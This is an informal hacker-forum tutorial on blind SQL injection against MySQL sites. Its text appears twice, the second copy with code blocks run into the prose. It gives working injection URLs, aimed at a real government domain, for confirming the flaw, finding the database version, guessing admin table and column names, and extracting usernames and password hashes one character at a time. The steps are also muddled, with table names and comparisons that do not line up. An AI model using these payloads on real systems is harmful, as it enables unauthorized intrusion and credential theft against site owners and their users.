blind sql injection "detailed tutorial"
blind sql injection
if you dont know about mysql injection turn around and learn it b4 u even consider learning this
because this is a whole different story.
1. test for vulnerability
so you have a site lets say :
just like normal mysql injection
but for blind you put
if you see any text from the page missing
or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that
then its vuln
this works
because 1=2 is always false
you see if it was
then you would get the normal page
because 1=1 is always true
2. mysql version
to find mysql version you need to do this query
if the pages comes back true then the version is 4
if not then try
if it comes back true then its a version 5
3. fuzzing tables and columns
to find the table name you need to guess it
so...
here is the query
i have guessed the table admin if the page loads true then the table exists
eg. the table name is administrator
and we try
then it will return with an error a.k.a. false
but if we did
then it would not error a.k.a. true
now for the column
so the table is administrator
and we found that by fuzzing
now we need the column name
we fuzz it by
if the column password exists then it wont error
you get my drift...
4. extracting password with ascii
so now we have the table/column we need to extract
well as you know it wont just pop up on the screen
we will need to use the ancii char
if this returns true then you need to go higher
if this errors then its not greater than 103 and greater than/or 99
now try
no error then its greater than 99 and not greater than 103
higher
error
so its greater than 99 but not greater than 101
higher
error
so its greater than 99 but not greater than 100 making it 100
the first character of the password is 100 which if u put into an ascii converter you will see
that it is the letter d
now you need to find the next character
notice how i did where userid=1),2,1))>60 instead of 1,1
so this will be doing the second character
so keep extracting characters untill u get an error
then u will have the hash / password
Sketch- out
a good ascii coneverter can be found at
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
if you dont know about mysql injection turn around and learn it b4 u even consider learning this
because this is a whole different story.
1. test for vulnerability
so you have a site lets say :
Code:
www.cia.gov/news.php?id=1but for blind you put
Code:
www.cia.gov/news.php?id=1 and 1=2or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that
then its vuln
this works
because 1=2 is always false
you see if it was
Code:
www.cia.gov/index.php?id=1 and 1=1because 1=1 is always true
2. mysql version
to find mysql version you need to do this query
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4if not then try
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=53. fuzzing tables and columns
to find the table name you need to guess it
so...
here is the query
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1eg. the table name is administrator
and we try
Code:
(SELECT 1 from users limit 0,1)=1but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1now for the column
so the table is administrator
and we found that by fuzzing
now we need the column name
we fuzz it by
Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1you get my drift...
4. extracting password with ascii
so now we have the table/column we need to extract
well as you know it wont just pop up on the screen
we will need to use the ancii char
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103now try
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101so its greater than 99 but not greater than 101
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100so its greater than 99 but not greater than 100 making it 100
the first character of the password is 100 which if u put into an ascii converter you will see
that it is the letter d
now you need to find the next character
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60so this will be doing the second character
so keep extracting characters untill u get an error
then u will have the hash / password
Sketch- out
a good ascii coneverter can be found at
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html